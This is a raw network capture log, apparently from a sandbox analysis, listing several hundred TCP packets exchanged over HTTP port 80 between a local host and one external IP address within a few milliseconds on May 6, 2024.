May 6, 2024 07:53:04.779328108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779331923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779340029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779345989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779359102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779392004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779392004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779433966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779445887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779454947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779467106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779470921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779479027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779490948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779498100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779503107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779514074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779524088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779525042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779552937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779557943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779561043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779568911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779581070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779593945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779593945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779604912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779611111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779617071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779624939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779628038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779639006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779644966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779652119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779664040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779669046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779689074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779700041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779705048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779717922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779730082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779742956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779743910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779755116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779757023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779766083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779776096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779784918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779813051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779834986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779850006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779861927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.779872894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779886007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.779908895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780029058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780039072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780050993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780061960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780062914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780073881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780076027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780086040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780088902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780097008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780107975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780116081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780139923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780153990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780186892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780199051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780209064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780220032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780220985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780230999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780244112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780246019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780256033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780268908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780272961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780284882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780312061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780324936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780338049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780356884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780368090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780369997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780369997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780380011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780380964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780395031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780407906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780435085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780508041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780519962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780529976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780538082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780543089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780544996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780554056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780565023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780571938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780576944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780589104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780597925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780600071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780611038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780618906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780622959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780627012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780636072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780649900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780659914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780661106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780673027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780682087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780687094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780694962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780698061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780708075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780720949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780725956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780772924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780785084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780796051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780800104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780800104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780805111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780807972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780819893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780827045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780844927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780867100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780944109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780956030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780966997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780977964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780980110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.780989885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.780999899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781002045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781013012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781024933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781025887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781037092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781042099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781054020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781066895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781085968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781092882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781097889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781110048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781117916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781121016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781133890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781145096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781147957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781172037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781188965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781244040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781255960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781266928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781279087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781280994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781291008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781292915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781301975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781312943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781313896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781339884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781352043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781374931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781387091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781398058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781408072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781411886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781419992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781425953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781433105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781450033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781471014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781546116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781558037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781568050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781579018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781582117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781589985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781603098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781610966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781614065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781625986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781632900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781632900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781637907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781650066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781652927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781662941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781673908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781685114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781687021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781697035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781697035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781711102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781722069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781722069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781734943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781738997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781763077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781785011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781795025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781807899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781817913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781830072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781832933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781851053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781867981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.781976938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.781989098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782001019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782011986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782016993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782022953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782035112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782040119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782046080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782059908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782069921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782073021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782083035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782084942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782098055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782109976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782111883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782120943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782134056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782140017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782146931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782155037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782159090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782171011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782181025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782182932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782195091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782206059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782215118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782227993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782246113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782330990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782341957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782352924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782365084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782366037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782377005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782386065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782388926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782399893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782403946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782403946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782413006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782424927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782430887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782438040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782447100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782460928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782480955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782488108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782494068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782505035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782516003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782517910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782526970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782535076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782537937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782552004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782556057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782566071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782577038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782578945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782588005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782593966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782608986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782620907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782623053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782634974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782645941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782649040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782658100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782670021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782676935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782682896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782700062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782712936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782740116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782757998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782771111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782782078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782793045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782793045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782807112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782814026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782819033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782828093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782855034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782932043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782943964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782953978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782964945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782970905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782977104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782988071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.782994986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.782999039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783010960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783021927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783023119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783032894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783039093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783044100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783050060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783071995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783075094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783085108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783097029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783109903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783109903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783122063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783132076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783157110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783251047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783262968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783272982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783284903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783288956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783296108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783307076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783307076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783318996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783318996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783329964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783341885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783346891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783354044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783365011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783366919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783376932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.783385992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783385992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.783387899 CEST	80	49741	5.42.66.10	192.168.2.4
